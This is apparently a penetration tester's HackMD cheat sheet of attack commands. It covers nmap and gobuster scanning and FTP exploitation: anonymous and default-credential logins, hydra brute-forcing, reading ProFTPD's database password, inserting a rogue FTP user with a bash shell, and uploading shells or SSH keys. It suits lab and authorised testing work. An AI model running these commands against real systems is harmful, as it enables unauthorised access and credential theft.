 HackMD-  Javier Olmedo·Last edited by Javier Olmedo on Jun 4, 2024Linked with GitHubContributed by
Log in to edit or delete your comments and be notified of replies.
There is no commentSelect some text and then click Comment, or simply add a comment to this page from below to start a discussion.Top commands 🥇
Nmap
sudo nmap -sSCV --min-rate 5000 -Pn -n -p- --open -vvv -oA all_ports <target>
Gobuster
# Directories
gobuster dir -e -t 100 -b 400-600 --exclude-length 0 --no-error -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -w /usr/share/wordlists/own/final_directories.txt -u <target>
# Filenames
gobuster dir -e -t 100 -b 400-600 --exclude-length 0 --no-error -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -w /usr/share/own/dirb/common_4459.txt -x .asp,.aspx,.config,.do,.git,.html,.jsp,.pdf,.php,.ps1,.sql,.txt,.yml -u <target>
# Virtual hosts
gobuster vhost -t 100 -w /usr/share/own/subdomain/knocpy_1921.txt --append-domain -u <target> # No use http://
Pentesting Services 🪲
21 FTP
# Default ports are 20 (for data), 21 (for control).
# Try `admin:admin user:system` credentials always.
# If FTP not working or slow, use `passive off` after login successful.
# Use `binary` if you upload shell.exe
# Check anonymous user
ftp -n <target> <<END
user anonymous anonymous
<command>
quit
END
# ls
# put <local_file <remote_file>
# Download
get <file>
# Upload
mput <local_file> <remote_file>
# Use secure FTP
ftp-ssl -z secure -z verify=0 -z cipher="$(openssl ciphers -tls1)" -p <target>
# ProFTP credentials
cat /etc/proftpd/sql.conf # SQLConnectInfo proftpd@localhost proftpd protfpd_with_MYSQL_password
# Add user
mysql -u proftpd -p'protfpd_with_MYSQL_password' -h 127.0.0.1 -P 3306
show databases;
use proftpd;
select * from ftpuser;
# Create proftpd user
/bin/echo "{md5}"`/bin/echo -n '23Qwerty!' | openssl dgst -binary -md5 | openssl enc -base64` # {md5}RPesAkyTyJaqB6afVNB2pA==
INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (NULL, 'benoit', '{md5}RPesAkyTyJaqB6afVNB2pA==', '1000', '1000', '/', '/bin/bash', '0', '2022-12-05 05:26:29', '2022-12-12 05:26:29');
# Connect to FTP and upload authorized_keys
# https://medium.com/@nico26deo/how-to-set-up-proftpd-with-a-mysql-backend-on-ubuntu-c6f23a638caf
# Nmap FTP NSE
nmap --script ftp-anon -p 21 <target>
nmap --script ftp-vuln* -p 21 <target>
nmap --script ftp-* -p 21 <target>
# FTP Bruteforce
hydra -I -V -f -u -e nsr -L usernames.txt -P usernames.txt <target> ftp -s 21 # or use ftp://<machine_ip>
# Default credentials
paste -d ":" usernames.txt passwords.txt > ftp_credentials.txt
hydra -I -V -f -u -e s -t 1 -C /usr/share/wordlists/own/services/ftp/ftp_credentials.txt exghost.offsec ftp -s 21 # Try machine_name:machine_name
